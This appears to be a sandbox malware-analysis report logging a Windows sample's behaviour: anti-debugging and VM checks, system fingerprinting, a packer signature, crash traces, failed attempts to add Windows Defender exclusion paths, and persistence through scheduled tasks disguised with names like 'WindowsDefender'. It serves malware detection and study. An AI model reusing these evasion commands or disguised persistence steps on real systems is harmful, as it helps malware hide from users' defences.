GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:14 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:06 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:06 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:36 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:36 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 13, 2022, 8:36 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (19 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 13, 2022, 8:13 p.m.			0	0
IsDebuggerPresent Aug. 13, 2022, 8:13 p.m.			0	0
IsDebuggerPresent Aug. 13, 2022, 8:13 p.m.			0	0
IsDebuggerPresent Aug. 13, 2022, 8:13 p.m.			0	0
IsDebuggerPresent Aug. 13, 2022, 8:13 p.m.			0	0
IsDebuggerPresent Aug. 13, 2022, 8:13 p.m.			0	0
IsDebuggerPresent Aug. 13, 2022, 8:13 p.m.			0	0
IsDebuggerPresent Aug. 13, 2022, 8:13 p.m.			0	0
IsDebuggerPresent Aug. 13, 2022, 8:13 p.m.			0	0
IsDebuggerPresent Aug. 13, 2022, 8:13 p.m.			0	0
IsDebuggerPresent Aug. 13, 2022, 8:13 p.m.			0	0
IsDebuggerPresent Aug. 13, 2022, 8:14 p.m.			0	0
IsDebuggerPresent Aug. 13, 2022, 8:36 p.m.			0	0
IsDebuggerPresent Aug. 13, 2022, 8:36 p.m.			0	0
IsDebuggerPresent Aug. 13, 2022, 8:36 p.m.			0	0
IsDebuggerPresent Aug. 13, 2022, 8:36 p.m.			0	0
IsDebuggerPresent Aug. 13, 2022, 8:36 p.m.			0	0
IsDebuggerPresent Aug. 13, 2022, 8:36 p.m.			0	0
IsDebuggerPresent Aug. 13, 2022, 8:36 p.m.			0	0

Command line console output was observed (38 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: Active code page: 1251 console_handle: 0x00000013	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: + Add-MpPreference <<<< -ExclusionPath $ENV:USERPROFILE\Desktop console_handle: 0x00000053	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000005f	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: mmandNotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: + Add-MpPreference <<<< -ExclusionPath C:\ProgramData\Dllhost console_handle: 0x00000053	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000005f	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: mmandNotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: The term 'Add-MpPreference' is not recognized as the name of a cmdlet, function console_handle: 0x00000023	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: , script file, or operable program. Check the spelling of the name, or if a pat console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: h was included, verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: At line:1 char:17 console_handle: 0x00000047	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: + Add-MpPreference <<<< -ExclusionPath C:\ProgramData\SystemData console_handle: 0x00000053	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: + CategoryInfo : ObjectNotFound: (Add-MpPreference:String) [], Co console_handle: 0x0000005f	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: mmandNotFoundException console_handle: 0x0000006b	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x00000077	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: SUCCESS: The scheduled task "SecurityHealthSystray" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: SUCCESS: The scheduled task "WindowsDefender" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: SUCCESS: The scheduled task "AntiMalwareServiceExecutable" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: SUCCESS: The scheduled task "WmiPrvSE" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: SUCCESS: The scheduled task "dllhost" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: SUCCESS: The scheduled task "OneDriveService" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: SUCCESS: The scheduled task "MicrosoftEdgeUpd" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: SUCCESS: The scheduled task "NvStray" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: SUCCESS: The scheduled task "WindowsDefenderServices\WindowsDefenderServicesService_bk1481" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: SUCCESS: The scheduled task "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk579" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: SUCCESS: The scheduled task "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk406" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 13, 2022, 8:36 p.m.	buffer: SUCCESS: The scheduled task "SettingSysHost\SettingSysHostService_bk7066" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 13, 2022, 8:37 p.m.	buffer: Active code page: 1251 console_handle: 0x00000013	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 232 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518bb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518bb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518bb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518bb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518c38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518c38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518b38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518b38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518b38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518b38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518b38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518bb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518bb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00518db8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00519078 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005190b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005190b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00519838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00519838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00519978 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071aad8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071aad8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071aad8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071aad8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071ab58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071ab58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071aa58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071aa58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071aa58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071aa58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071aa58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071aad8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071aad8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071acd8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071b158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071b1d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071b1d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071b498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071b498 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:14 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0071b358 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00380b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00380b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00380b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00380b18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00380b98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00380b98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00380a98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00380a98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00380a98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 13, 2022, 8:13 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00380a98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (2 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 13, 2022, 8:13 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)

section	CODE
section	DATA
section	BSS

The executable uses a known packer (1 event)

packer

BobSoft Mini Delphi -> BoB / BobSoft

One or more processes crashed (7 events)

Time & API	Arguments	Status
__exception__ Aug. 13, 2022, 8:14 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74de374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x752d4387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74ddef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74dd6a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74dd6b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74dd6a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74df5c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x74e706b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x753ad7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x753ad876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x753addd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x752c8a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x752c8938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x752c950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x753adccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x753adb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x753ae1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x752c9367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x752c9326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755962fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75596d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755977c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7559788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x7528a48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x7528853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x7528a4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x7529cd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x7529d87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x766fb727 registers.esp: 131331100 registers.edi: 6821756 registers.eax: 131331100 registers.ebp: 131331180 registers.edx: 523248241 registers.ebx: 131331464 registers.esi: 2147746133 registers.ecx: 91117656	1
__exception__ Aug. 13, 2022, 8:14 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74de374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x753af725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74df414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x7527fe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x753aa338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x7678e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x767672ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x7675ab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x7675ea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x767587f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x7675ba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755962fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75596d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755977c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x75597bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x7678516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x767850ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x7675a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76759b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76759aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x7678530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x767857a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x7266540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x726652ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x72740ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77317e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x772f54f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x766fb727 registers.esp: 72669200 registers.edi: 1965816336 registers.eax: 72669200 registers.ebp: 72669280 registers.edx: 1 registers.ebx: 109954708 registers.esi: 2147746133 registers.ecx: 3681449241	1
__exception__ Aug. 13, 2022, 8:14 p.m.	stacktrace: 0xa86192 0xa8610d 0xa8190c 0xa81660 0xa80056 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fc4264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fc42e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fcf74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fcf7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fd81dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fd81e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fd81f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fd8416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x702ff5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x70377f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x70374de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 8b d0 85 c0 75 06 8b 15 2c exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xa86221 registers.esp: 2026652 registers.edi: 39150088 registers.eax: 0 registers.ebp: 2026676 registers.edx: 5200968 registers.ebx: 37402040 registers.esi: 39150268 registers.ecx: 0	1
__exception__ Aug. 13, 2022, 8:14 p.m.	stacktrace: 0x5bc721 0x5bc5e1 0x5b7615 0x5b7320 0x5b4ea6 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6fc4264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x6fc42e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x6fcf74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x6fcf7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x6fd81dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x6fd81e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x6fd81f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x6fd8416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x702ff5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x70377f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x70374de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 